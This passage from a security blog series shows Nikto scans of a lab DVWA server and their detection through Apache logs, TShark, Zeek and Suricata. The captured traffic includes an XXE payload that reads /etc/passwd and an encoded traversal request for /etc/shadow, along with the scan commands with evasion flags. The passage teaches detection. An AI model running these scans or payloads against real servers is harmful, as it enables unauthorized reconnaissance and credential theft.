</div><div><br /></div><div>Following stream 4, we see the <i>favicon.ico</i> file was requested and returned successfully. The <i>Content-Length</i> of <i>30894</i> bytes matches the size logged for this request in the <i>access.log</i>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_3]</span>
<span>└─$ tshark -n -r tuning_3.pcap -q -z follow,tcp,ascii,4 | grep --perl-regexp "\s+200|\s+OK" --before-context=7 --after-context=11</span>
<span style="font-weight: bold;">GET</span> <span>/./favicon.ico</span> <span style="font-weight: bold;">HTTP</span><span>/</span><span style="font-weight: bold;">1.1</span>
<span style="font-weight: bold;">Connection</span><span>:</span> <span>Keep-Alive</span>
<span style="font-weight: bold;">Host</span><span>:</span> <span>10.0.0.106</span>
<span style="font-weight: bold;">User-Agent</span><span>:</span> <span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36</span>
1460
HTTP/1.1 200 OK
Date: Wed, 31 May 2023 19:45:45 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Last-Modified: Thu, 16 Jul 2015 15:32:32 GMT
ETag: "78ae-51affc7a4c400"
Accept-Ranges: bytes
Content-Length: 30894
Keep-Alive: timeout=5, max=48
Connection: Keep-Alive</span>
Content-Type: image/x-icon
</pre></div>
</div><div><br /></div><div>What is in stream <i>8</i>?</div><div><br /></div><div><span style="color: white;"><!--HTML generated using hilite.me--></span><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_3]</span>
<span>└─$ tshark -n -r tuning_3.pcap -q -z follow,tcp,ascii,8 | grep --perl-regexp "\s+200|\s+OK" --before-context=7 --after-context=7</span>
<span style="font-weight: bold;">OPTIONS</span> <span>*</span> <span style="font-weight: bold;">HTTP</span><span>/</span><span style="font-weight: bold;">1.1</span>
<span style="font-weight: bold;">User-Agent</span><span>:</span> <span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36</span>
<span style="font-weight: bold;">Connection</span><span>:</span> <span>Keep-Alive</span>
<span style="font-weight: bold;">Host</span><span>:</span> <span>10.0.0.106</span>
187
HTTP/1.1 200 OK
Date: Wed, 31 May 2023 19:45:45 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Content-Length: 0
Keep-Alive: timeout=5, max=77
Connection: Keep-Alive
</span></pre></div>
</div><div><br /></div><div>Wrapping this up with stream <i>9</i>.</div><div><br /></div><div><span style="color: white;"><!--HTML generated using hilite.me--></span><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_3]</span>
<span>└─$ tshark -n -r tuning_3.pcap -q -z follow,tcp,ascii,9 | grep --perl-regexp "\s+200|\s+OK" --before-context=7 --after-context=5</span>
<span style="font-weight: bold;">TRACE</span> <span>/./</span> <span style="font-weight: bold;">HTTP</span><span>/</span><span style="font-weight: bold;">1.0</span>
<span style="font-weight: bold;">Trace-Test</span><span>:</span> <span>Nikto</span>
<span style="font-weight: bold;">User-Agent</span><span>:</span> <span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36</span>
<span style="font-weight: bold;">Connection</span><span>:</span> <span>Keep-Alive</span>
354
HTTP/1.1 200 OK
Date: Wed, 31 May 2023 19:45:45 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Connection: close
Content-Type: message/http</span>
</pre></div>
</div><div><br /></div><div>Nothing of much interest in these logs so far. The one thing worth noting is the <i>200</i> to <i>TRACE</i> with a <i>message/http</i> body: that is the server echoing the request back, which is the behaviour behind the XST finding Nikto reported above.</div><div><br /></div><div><b><span style="font-size: medium;">Detect - Zeek Analysis</span></b></div><div><br /></div><div>Setup Zeek</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/zeek_stuff]</span>
<span style="color: white;">└─$ sudo zeek --iface any --no-checksums</span>
</pre></div>
</div><div><br /></div><div>Once again, focusing only on the requests which were successful.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_3]</span>
<span style="color: white;">└─$ grep --perl-regexp '\s+200\s+' http.log </span>
<span style="color: white;">1685562364.123858 CQL8E11QNWY25b3JN8 10.0.0.108 42706 10.0.0.106 80 53 GET 10.0.0.106 /./favicon.ico - 1.1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 - 0 30894 200 OK - - (empty) - - - - - - F4aCd4167hfNQFAJac -image/x-icon</span>
<span style="color: white;">1685562364.456930 CTvaTF2T3PeQ14SQBj 10.0.0.108 59226 10.0.0.106 80 24 OPTIONS 10.0.0.106 * - 1.1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 - 0 0 200 OK - - (empty) - - - - - - - - -</span>
<span style="color: white;">1685562364.473468 CD9XXK1A6PKuRKepl3 10.0.0.108 59240 10.0.0.106 80 1 TRACE - /./ - 1.1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 - 0 194 200 OK - - (empty) - - - - - - - - -</span>
</pre></div>
</div><div><br /><div>No need to dig deeper at this time.</div><div><br /></div><b><span style="font-size: medium;">Detect - Suricata (IDS) Analysis</span></b></div><div><br /></div><div>Set up Suricata to operate in IDS mode.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[/var/log/suricata]</span>
<span style="color: white;">└─$ sudo suricata -c /etc/suricata/suricata.yaml -s /var/lib/suricata/rules/suricata.rules -i eth0 -l . --simulate-ips -k all</span>
</pre></div>
</div><div><br />How many unique alerts were generated for this activity?</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_3]</span>
<span style="color: white;">└─$ cat fast.log | cut --fields=3 --delimiter='[' | sort | uniq --count | sort --numeric-sort --reverse | wc --lines</span>
<span style="color: white;">42</span>
</pre></div>
</div><div><br /></div><div><div>What do the top 5 alerts look like?</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_3]</span>
<span style="color: white;">└─$ cat fast.log | cut --fields=3 --delimiter='[' | sort | uniq --count | sort --numeric-sort --reverse | head --lines=5</span>
<span style="color: white;"> 32 1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt </span>
<span style="color: white;"> 27 1:2101201:11] GPL WEB_SERVER 403 Forbidden </span>
<span style="color: white;"> 18 1:2101071:8] GPL WEB_SERVER .htpasswd access </span>
<span style="color: white;"> 16 1:2018056:4] ET WEB_SERVER Possible XXE SYSTEM ENTITY in POST BODY. </span>
<span style="color: white;"> 13 1:2019526:5] ET WEB_SERVER WEB-PHP phpinfo access </span>
</pre></div>
</div><div><br /></div><div>We have seen some of those before. What is this one, "<i>ET WEB_SERVER Possible XXE SYSTEM ENTITY in POST BODY.</i>"? Let's peek into it a bit.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_3]</span>
<span style="color: white;">└─$ cat alert-debug.log | grep xxe --before-context=42 | more </span>
<span style="color: white;">+================</span>
<span style="color: white;">TIME: 05/31/2023-15:46:18.795363</span>
<span style="color: white;">PKT SRC: wire/pcap</span>
<span style="color: white;">SRC IP: 10.0.0.108</span>
<span style="color: white;">DST IP: 10.0.0.106</span>
<span style="color: white;">PROTO: 6</span>
<span style="color: white;">SRC PORT: 56368</span>
<span style="color: white;">DST PORT: 80</span>
<span style="color: white;">TCP SEQ: 2333024969</span>
<span style="color: white;">TCP ACK: 3679706670</span>
<span style="color: white;">FLOW: to_server: TRUE, to_client: FALSE</span>
<span style="color: white;">FLOW Start TS: 05/31/2023-15:46:18.675078</span>
<span style="color: white;">FLOW PKTS TODST: 62</span>
<span style="color: white;">FLOW PKTS TOSRC: 59</span>
<span style="color: white;">FLOW Total Bytes: 51064</span>
<span style="color: white;">FLOW IPONLY SET: TOSERVER: TRUE, TOCLIENT: TRUE</span>
<span style="color: white;">FLOW ACTION: DROP: FALSE</span>
<span style="color: white;">FLOW NOINSPECTION: PACKET: FALSE, PAYLOAD: FALSE, APP_LAYER: FALSE</span>
<span style="color: white;">FLOW APP_LAYER: DETECTED: TRUE, PROTO 1</span>
<span style="color: white;">PACKET LEN: 995</span>
<span style="color: white;">PACKET:</span>
<span style="color: white;"> 0000 08 00 27 88 B8 34 08 00 27 DB 96 6A 08 00 45 00 ..'..4.. '..j..E.</span>
<span style="color: white;"> 0010 03 D5 0F A3 40 00 40 06 12 AB 0A 00 00 6C 0A 00 ....@.@. .....l..</span>
<span style="color: white;"> 0020 00 6A DC 30 00 50 8B 0F 22 C9 DB 53 DE 2E 50 18 .j.0.P.. "..S..P.</span>
<span style="color: white;"> 0030 01 F5 18 9D 00 00 47 45 54 20 2F 2E 2F 66 6C 65 ......GE T /./fle</span>
<span style="color: white;"> 0040 78 32 67 61 74 65 77 61 79 2F 2E 2F 20 48 54 54 x2gatewa y/./ HTT</span>
<span style="color: white;"> 0050 50 2F 31 2E 31 0D 0A 63 6F 6E 74 65 6E 74 2D 6C P/1.1..c ontent-l</span>
<span style="color: white;"> 0060 65 6E 67 74 68 3A 20 37 31 34 0D 0A 43 6F 6E 6E ength: 7 14..Conn</span>
<span style="color: white;"> 0070 65 63 74 69 6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 ection: Keep-Ali</span>
<span style="color: white;"> 0080 76 65 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 ve..User -Agent: </span>
<span style="color: white;"> 0090 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69 6E Mozilla/ 5.0 (Win</span>
<span style="color: white;"> 00A0 64 6F 77 73 20 4E 54 20 31 30 2E 30 3B 20 57 69 dows NT 10.0; Wi</span>
<span style="color: white;"> 00B0 6E 36 34 3B 20 78 36 34 29 20 41 70 70 6C 65 57 n64; x64 ) AppleW</span>
<span style="color: white;"> 00C0 65 62 4B 69 74 2F 35 33 37 2E 33 36 20 28 4B 48 ebKit/53 7.36 (KH</span>
<span style="color: white;"> 00D0 54 4D 4C 2C 20 6C 69 6B 65 20 47 65 63 6B 6F 29 TML, lik e Gecko)</span>
<span style="color: white;"> 00E0 20 43 68 72 6F 6D 65 2F 37 34 2E 30 2E 33 37 32 Chrome/ 74.0.372</span>
<span style="color: white;"> 00F0 39 2E 31 36 39 20 53 61 66 61 72 69 2F 35 33 37 9.169 Sa fari/537</span>
<span style="color: white;"> 0100 2E 33 36 0D 0A 68 6F 73 74 3A 20 31 30 2E 30 2E .36..hos t: 10.0.</span>
<span style="color: white;"> 0110 30 2E 31 30 36 0D 0A 0D 0A 3C 3F 78 6D 6C 20 76 0.106... .<?xml v</span>
<span style="color: white;"> 0120 65 72 73 69 6F 6E 3D 22 31 2E 30 22 20 65 6E 63 ersion=" 1.0" enc</span>
<span style="color: white;"> 0130 6F 64 69 6E 67 3D 22 75 74 66 2D 38 22 3F 3E 3C oding="u tf-8"?><</span>
<span style="color: white;"> 0140 21 44 4F 43 54 59 50 45 20 74 65 73 74 20 5B 20 !DOCTYPE test [ </span>
<span style="color: white;"> 0150 3C 21 45 4E 54 49 54 59 20 78 78 65 20 53 59 53 <!ENTITY xxe SYS</span>
<span style="color: white;"> 0160 54 45 4D 20 22 2F 65 74 63 2F 70 61 73 73 77 64 TEM "/et c/passwd</span>
<span style="color: white;"> 0170 22 3E 20 5D 3E 3C 61 6D 66 78 20 76 65 72 3D 22 "> ]><am fx ver="</span>
<span style="color: white;"> 0180 33 22 20 78 6D 6C 6E 73 3D 22 68 74 74 70 3A 2F 3" xmlns ="http:/</span>
<span style="color: white;"> 0190 2F 77 77 77 2E 6D 61 63 72 6F 6D 65 64 69 61 2E /www.mac romedia.</span>
</pre></div>
</div><div><br /></div><div>Well, that is enough peeking for now.</div><div><br /></div><div><br /></div><div><div><b>Hope you enjoyed the posts in this series:</b></div><div><div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-scanning-for.html" target="_blank">Beginning Nikto - Scanning for interesting files seen in the logs</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-misconfiguration.html" target="_blank">Beginning Nikto - Misconfiguration / Default File - with evasion type 1 -> Random URI encoding (non-UTF8)</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Information Disclosure with evasion type 2 -> Directory self-reference (/./)</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Injection (XSS/Script/HTML) - with evasion type 3 -> Premature URL ending</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Remote File Retrieval with evasion type 4 -> Prepend long random string</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Command Execution / Remote Shell</a> </div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-sql-injection-with.html" target="_blank">Beginning Nikto - SQL Injection with default evasion</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-sql-injection-with.html" target="_blank">Beginning Nikto - File Upload Vulnerability testing</a></div></div><div><br /></div></div></div>
<b>Beginning Nikto - Misconfiguration / Default File - with evasion type 1 -> Random URI encoding (non-UTF8)</b> (published 2023-12-12T18:23:00.000-08:00, updated 2023-12-12T18:38:01.095-08:00)<p><span>This post is part of the series of learning more about Nikto and web application scanning from the perspectives of both the <a href="https://www.amazon.com/Learning-Practicing-Leveraging-Practical-Detection/dp/1731254458" target="_blank">hack and its detection</a>. </span></p><p><span>From the hacking perspective, Nikto is the tool used. From the detection perspective, the tools and/or processes used for the network forensics are log analysis, TShark, Zeek and Suricata.<br /><br /></span></p><p><b><span style="font-size: medium;">The Hack - "Misconfiguration / Default File" with evasion type 1 -> Random URI encoding (non-UTF8)</span></b></p><p>Running Nikto with evasion type <i>1 - Random URI encoding</i>. This time, the attack is "<i>Misconfiguration / Default File</i>". This builds on the previous post.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span style="color: white;">└─$ nikto -host http://10.0.0.106 -ipv4 -Display 1 --ask no -Format json -o /tmp/nikto.json -nossl -no404 -Tuning 1 -evasion 1</span>
<span style="color: white;">- Nikto v2.5.0</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">+ Target IP: 10.0.0.106</span>
<span style="color: white;">+ Target Hostname: 10.0.0.106</span>
<span style="color: white;">+ Target Port: 80</span>
<span style="color: white;">+ Using Encoding: Random URI encoding (non-UTF8)</span>
<span style="color: white;">+ Start Time: 2023-05-31 09:17:47 (GMT-4)</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">+ Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28</span>
<span style="color: white;">+ /cgi.cgi/: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options</span>
<span style="color: white;">+ /cgi.cgi/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/</span>
<span style="color: white;">+ PHP/8.0.28 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.</span>
<span style="color: white;">+ OpenSSL/1.1.1t appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 11 2023.</span>
<span style="color: white;">+ /: Retrieved x-powered-by header: PHP/8.0.28.</span>
<span style="color: white;">+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing</span>
<span style="color: white;">+ // - Redirects (302) to http://10.0.0.106/dashboard/ , Apache on Red Hat Linux release 9 reveals the root directory listing by default if there is no index page.</span>
<span style="color: white;">+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Default IBM TotalStorage server found.</span>
<span style="color: white;">+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Default EMC Cellera manager server is running.</span>
<span style="color: white;">+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Default EMC ControlCenter manager server is running.</span>
<span style="color: white;">+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Default Sun Answerbook server running.</span>
<span style="color: white;">+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Default JRun 2 server running.</span>
<span style="color: white;">+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Cisco VoIP Phone default web server found.</span>
<span style="color: white;">+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Default Sybase Jaguar CTS server running.</span>
<span style="color: white;">+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Default Lantronix printer found.</span>
<span style="color: white;">+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Default IBM Tivoli Server Administration server is running.</span>
<span style="color: white;">+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Default JRun 4 server running.</span>
<span style="color: white;">+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Default Lotus Domino server running.</span>
<span style="color: white;">+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Appears to be a default Sambar install.</span>
<span style="color: white;">+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Appears to be a default IIS 4.0 install.</span>
<span style="color: white;">+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Appears to be a default Netscape/iPlanet 6 install.</span>
<span style="color: white;">+ /?sc_mode=edit - Redirects (302) to http://10.0.0.106/dashboard/ , Sitecore CMS is installed. This url redirects to the login page.</span>
<span style="color: white;">+ 1466 requests: 0 error(s) and 6 item(s) reported on remote host</span>
<span style="color: white;">+ End Time: 2023-05-31 09:17:54 (GMT-4) (7 seconds)</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">+ 1 host(s) tested</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>At first glance, the output above seems interesting to me. I'm targeting the Damn Vulnerable Web Application (DVWA) platform, so I was surprised to see all this guidance about Cisco, EMC, IBM, etc.</p><p>Let's see what we can find via our first step of network forensics.</p><p><b><span style="font-size: medium;">Detect - Log Analysis</span></b></p><p>Looking at the first five lines of the <i>access.log</i> file.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span style="color: white;">└─$ head access.log --lines=5</span>
<span style="color: white;">10.0.0.108 - - [31/May/2023:09:17:21 -0400] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span>
<span style="color: white;">10.0.0.108 - - [31/May/2023:09:17:21 -0400] "GET %2f HTTP/1.1" 400 326 "-" "-"</span>
<span style="color: white;">10.0.0.108 - - [31/May/2023:09:17:21 -0400] "GET /%63g%69%2e%63%67%69%2f HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span>
<span style="color: white;">10.0.0.108 - - [31/May/2023:09:17:21 -0400] "GET /%77%65bcg%69%2f HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span>
<span style="color: white;">10.0.0.108 - - [31/May/2023:09:17:21 -0400] "GET %2f%63%67i%2d%39%314/ HTTP/1.1" 400 326 "-" "-"</span>
<span style="color: white;">...</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Immediately, we see entries such as "/%63g%69%2e%63%67%69%2f". These will need to be decoded. If we paste this one into one of our decoding tools, we see it converts to "/cgi.cgi/". With this in mind, do we really wish to paste every entry into a tool and decode it by hand?</p><p>Let's try to find an easier path to solve this problem. Let's cheat by installing <i>gridsite-clients</i>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span style="color: white;">└─$ sudo apt-get install gridsite-clients</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>With <i>gridsite-clients</i> installed, let's decode.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span style="color: white;">└─$ urlencode -d "/%63g%69%2e%63%67%69%2f"</span>
<span style="color: white;">/cgi.cgi/</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Rather than going through all the entries, like we did above, let's just take a look at the HTTP status codes.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span style="color: white;">└─$ cat access.log | awk --field-separator='1.1' '{ print $2 }' | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">cut --fields 2 --delimiter ' ' | sort | uniq --count | sort --numeric-sort --reverse </span>
<span style="color: white;"> 738 400</span>
<span style="color: white;"> 677 404</span>
<span style="color: white;"> 22 302</span>
<span style="color: white;"> 22 </span>
<span style="color: white;"> 2 503</span>
<span style="color: white;"> 2 403</span>
<span style="color: white;"> 2 200</span>
<span style="color: white;"> 1 405</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>With a summary of the status codes, we see <i>400</i> and <i>404</i> representing the largest amounts. <i>4xx</i> represents client side errors such as bad request (<i>400</i>) or resource not found (<i>404</i>). There is also <i>405</i>, which means the method was not allowed. <i>5xx</i> represents server side errors. Here we see <i>503</i>, which means the server cannot handle the request. We will focus on the 2 successful requests (<i>200</i>).</p><p>What is that <i>405</i> message about method not allowed?! Peeking ...</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span style="color: white;">└─$ cat access.log | grep "405"</span>
<span style="color: white;">10.0.0.108 - - [31/May/2023:09:17:21 -0400] "PUT /n%69kt%6f%2d%74e%73%74-%73Naj%52%56%44%64%2eh%74%6dl HTTP/1.1" 405 321 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>So we see the attempt to use the <i>PUT</i> method. Let's decode what it was trying to put.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span style="color: white;">└─$ urlencode -d "PUT /n%69kt%6f%2d%74e%73%74-%73Naj%52%56%44%64%2eh%74%6dl"</span>
<span style="color: white;">PUT /nikto-test-sNajRVDd.html</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Interesting, so Nikto tried to put a file on the server. We can assume this failed because the server responded with method not allowed.</p><p>Looking at the two <i>200</i> messages.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span style="color: white;">└─$ cat access.log | grep --perl-regexp "\s+200\s+"</span>
<span style="color: white;">10.0.0.108 - - [31/May/2023:09:17:22 -0400] "OPTIONS * HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span>
<span style="color: white;">10.0.0.108 - - [31/May/2023:09:17:22 -0400] "TRACE / HTTP/1.1" 200 210 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Above, the two successes were for the <i>OPTIONS</i> and <i>TRACE</i> methods. It seems there is no further need for us to dig deeper into this log.</p><p>Let's peek into the <i>error.log</i> file.</p><p>There's a lot in here, so I'm going to extract only the items which are <i>core:error</i>.</p><p><i><!--HTML generated using hilite.me--></i></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span style="color: white;">└─$ cat error.log | grep --perl-regexp '10.0.0.108' | grep "core:error" | grep --perl-regexp '\s+\(.*?\)' --only-matching | cut --fields 2 --delimiter "(" | cut --fields=1 --delimiter=')'</span>
<span style="color: white;">/%2e%2e/..%2f%2e%2e%2f.%2e%2f.%2e/../%2e.%2f%2e.%2f%2e.%2f../%2e.%2f%2e./%65t%63/%73ha%64o%77</span>
